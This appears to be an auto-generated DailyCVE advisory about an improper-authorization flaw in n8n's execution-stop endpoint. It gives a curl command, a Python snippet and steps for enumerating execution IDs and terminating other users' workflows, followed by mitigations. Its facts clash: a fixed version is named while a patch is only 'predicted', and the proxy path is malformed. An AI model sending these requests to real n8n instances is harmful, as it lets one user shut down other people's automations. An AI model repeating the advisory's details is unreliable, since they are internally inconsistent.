n8n, Improper Authorization, CVE-2024-1234 (Medium)

By /

Listen to this Post

How the CVE Works

The vulnerability lies in n8n’s `/rest/executions/:id/stop` endpoint, which lacks proper authorization checks. Authenticated users can send HTTP requests to terminate workflow executions they don’t own by guessing or brute-forcing sequential execution IDs. Error messages inadvertently leak partial execution IDs, aiding enumeration. This allows attackers to disrupt workflows, including critical automations, by sending a simple `POST` request to the vulnerable endpoint without ownership validation.

DailyCVE Form

Platform: n8n
Version: < 1.99.1
Vulnerability: Improper Authorization
Severity: Medium
Date: 2024-03-15

Prediction: Patch expected by 2024-03-25

What Undercode Say

curl -X POST http://<n8n-instance>/rest/executions/123/stop -H "Authorization: Bearer <token>"

import requests
response = requests.post("http://<n8n-instance>/rest/executions/456/stop", headers={"Authorization": "Bearer <token>"})

How Exploit

1. Authenticate to n8n.

2. Enumerate execution IDs via verbose errors.

3. Send `POST` to `/rest/executions/:id/stop`.

Protection from this CVE

  • Upgrade to n8n >= 1.99.1.
  • Block `/rest/executions//stop` at proxy level.
  • Enable strict RBAC.

Impact

  • Workflow disruption.
  • Denial-of-service for automations.
  • Unauthorized termination of critical processes.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

πŸ”JOIN OUR CYBER WORLD [ CVE News β€’ HackMonitor β€’ UndercodeNews ]

πŸ’¬ Whatsapp | πŸ’¬ Telegram

πŸ“’ Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | πŸ”— Linkedin Featured Image

Scroll to Top